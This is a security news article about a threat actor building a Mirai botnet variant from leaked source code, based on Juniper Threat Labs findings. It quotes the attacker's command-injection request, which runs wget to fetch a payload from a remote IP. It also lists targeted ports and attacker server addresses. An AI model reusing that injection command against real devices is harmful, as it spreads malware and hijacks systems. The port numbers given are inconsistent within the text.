Attacker builds malware variant with leaked Mirai source code

The source code of Mirai was leaked in September 2016, on the hacking community Hackforums.

The source code of Mirai was leaked in September 2016, on the hacking community Hackforums.

Just like the legitimate software world where plenty of code is available as open-source for developers to build upon, this is a harsh reality in the cybercrime world as well.

In light of this, recently, a threat actor going by the online handle of named “Priority” has been found using the infamous Mirai malware source code to launch their own version of the malware by researchers at Juniper Threat Labs.

According to the researchers, the version in the discussion is based on 2 variants of Mirai specifically, namely Demonbot and Scarface. The former is built to target Hadoop while the latter targets IoT devices along with including backdoors to maintain persistent access.

Exploiting these 2; the attacker has been using a singular command, “GET /shell?cd%20/tmp;%20wget%20http://45(.)13.58.4/;” to target the following ports:

  1. 5500
  2. 5501
  3. 5502
  4. 5050
  5. 60001 

It is worth noting that 6001 is the very first port to be attacked and also believed to be the prime target of the threat group.

Since only a single exploit is used by Priority, there may be a reason to believe that the attacker is not a sophisticated actor. This shouldn’t be a surprise since open-source code and access to the internet virtually allows anyone with a little bit of know-how to conduct such attacks.

With the attackers active since September 10, 2020, as shown in the chart above, their server has been found to be located at IP address 128(.)199.15.87 and 64(.)227.97.145 which are hosted on Digital Ocean’s Santa Clara data center. Explaining the choice of the attacker here, researchers at juniper stated in a blog post that:

Digital Ocean is a well-known VPS provider that allows for quick setup and destruction of Virtual Private Servers. These servers are a mainstay for hackers to pop-up launch their attacks and then destroy their servers at low cost.

Alongside, another VPS provider named Heficed was also used to host the malware itself.

To conclude, currently, this new variant has been termed as Trojan.Mirai.6981169 by Juniper Labs and Priority seems to be un-active for the moment.

This is just another case example of how merely fighting the main malware aka Mirai will not be enough since variants emerging from such projects will always arise posing new threats. Therefore, cybersecurity professionals need to be prepared for seeing not only more variants of Mirai but also other malware.

Did you enjoy reading this article? Do like our page on Facebook and follow us on Twitter.

Related Posts